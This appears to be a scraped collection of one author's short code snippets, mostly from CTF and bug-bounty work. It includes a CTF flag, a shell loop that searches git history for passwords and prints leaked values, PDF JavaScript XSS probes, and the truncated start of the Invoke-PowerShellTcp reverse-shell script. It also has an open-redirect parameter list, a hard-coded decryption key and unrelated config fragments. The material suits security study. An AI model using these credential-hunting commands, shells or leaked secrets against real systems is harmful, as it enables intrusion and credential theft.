ajdumanhug

[
  {
    "text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
    "author": "AJ Dumanhug"
  }
]

ajdumanhug

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

ajdumanhug

app.alert\("XSS"\);

app.response\("XSS"\);

app.launchURL\("https://example.com"\);



Other Methods:
- browseForDoc

ajdumanhug

important = ""
pip_important = "flag{h4ckst33tb0ys}"
import base64
randomvar = important.encode('ascii')
important_tottaly = base64.b64encode(randomvar)
import random
nothin_important = important_tottaly.decode('ascii')
pip_important = ""
supa_strong = ""
for n in nothin_important:

ajdumanhug

BOOK_TRAVEL, CONTACT_US, DONATE, DONATE_NOW, DOWNLOAD, GET_DIRECTIONS, GO_LIVE, INTERESTED, LEARN_MORE, LIKE_PAGE, MESSAGE_PAGE, SAVE, SEND_TIP, SHOP_NOW, SIGN_UP, VIEW_INSTAGRAM_PROFILE, INSTAGRAM_MESSAGE, LOYALTY_LEARN_MORE, PURCHASE_GIFT_CARDS, PAY_TO_ACCESS, GET_MOBILE_APP, INSTALL_MOBILE_APP, USE_MOBILE_APP, INSTALL_APP, USE_APP, PLAY_GAME, WATCH_VIDEO, WATCH_MORE, OPEN_LINK, NO_BUTTON, LISTEN_MUSIC, MOBILE_DOWNLOAD, GET_OFFER, GET_OFFER_VIEW, BUY_NOW, BUY_TICKETS, UPDATE_APP, BET_NOW, ADD_TO_CART, ORDER_NOW, SELL_NOW, GET_SHOWTIMES, LISTEN_NOW, GET_EVENT_TICKETS, SEARCH_MORE, PRE_REGISTER, SWIPE_UP_PRODUCT, SWIPE_UP_SHOP, CALL, MISSED_CALL, CALL_NOW, CALL_ME, APPLY_NOW, BUY, GET_QUOTE, SUBSCRIBE, RECORD_NOW, VOTE_NOW, GIVE_FREE_RIDES, REGISTER_NOW, OPEN_MESSENGER_EXT, EVENT_RSVP, CIVIC_ACTION, SEND_INVITES, REFER_FRIENDS, REQUEST_TIME, SEE_MENU, WHATSAPP_MESSAGE, SEARCH, TRY_IT, TRY_ON, LINK_CARD, DIAL_CODE, FIND_YOUR_GROUPS

ajdumanhug

enable_tc_mode
guest-access traffic-class internet internet
guest-access traffic-class 1 name xwf
guest-access traffic-class 1 permit *.expresswifi.com
guest-access traffic-class 1 permit xwf-static.xx.fbcdn.net
guest-access traffic-class 1 permit xwf-scontent.xx.fbcdn.net
guest-access traffic-class 1 permit xwf.facebook.com
guest-access traffic-class 1 permit *.xwf.fyi
guest-access traffic-class 1 permit h.facebook.com
guest-access traffic-class 1 permit graph.expresswifi.com

ajdumanhug

function Invoke-PowerShellTcp 
{  
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]

ajdumanhug

dest
redirect
uri
path
continue
url
window
next
data
reference

ajdumanhug

dest
redirect
uri
path
continue
url
window
next
data
reference

ajdumanhug

Imports System
Imports System.Text
Imports System.Security.Cryptography
				
Public Module Module1
	Public Sub Main()
		Console.WriteLine( Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) )
	End Sub

    Public Function Decrypt(ByVal cipherText As String, _